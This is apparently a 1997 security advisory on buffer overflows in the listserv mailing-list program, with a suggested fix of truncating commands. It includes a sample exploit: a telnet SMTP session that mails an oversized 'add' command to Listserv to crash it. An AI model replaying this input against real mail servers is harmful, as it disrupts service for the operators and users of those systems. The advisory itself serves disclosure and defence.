COMMAND
listserv
SYSTEMS AFFECTED
Systems running listserv that have tjis bug
PROBLEM
PLaGuEZ have found several buffer overflows in listserv, a widely
used mailing-lists managment program. By exploiting those
vulnerabilities, malicious hackers can remotely execute arbitrary
commands on the target machine: typically, place backdoors on
the system or remove users' mail files, as listserv requires to
run as sgid 'mail'.
Though, the impact is harmless because it is almost impossible
to predict the parameters to use for the actual overflow, i.e.
stack prediction and buffer size. This hole is still annoying
because it can provide a efficient DOS attack: the attacker would
repeatly connect to the target host and send an oversized buffer,
resulting in many segfaults on the target system.
User commands are sent directly through the body of the message,
where users can write whatever they want. Potential buffer
overflows are located in the functions that handle those commands.
( main() bof are mostly harmless) e.g: +file subscribe.c,
Sample exploit:
---------------
$ telnet xxxxxx.xxx 25
Trying 123.123.123.123...
Connected to 123.123.123.123
Escape character is '^]'.
220 xxxxxx.xxx ESMTP Sendmail 8.8.5/8.8.2; Fri, 20 Jun 1997 08:54:52 -0400
MAIL FROM: oooops@oooops.org
250 ooops ... Sender ok
RCPT TO: Listserv
250 Listserv ... Recipient ok
DATA
254 Enter mail, end with "." on a line by itself
From: noone
add aaaaaaaaaaaaaaa[...lotsa chars go here]aaaaaaaaaaaaa aaaaaa aaaaaa
.
250 RAFZ04965 Message accepted for delivery
QUIT
221 xxxxxxx.xxx closing connection
The listserv handling this session with bof and then crash.
SOLUTION
A possible one would be to use dynamic length strings, or (easier
to implement) strip each command down to its 200 first characters
for example.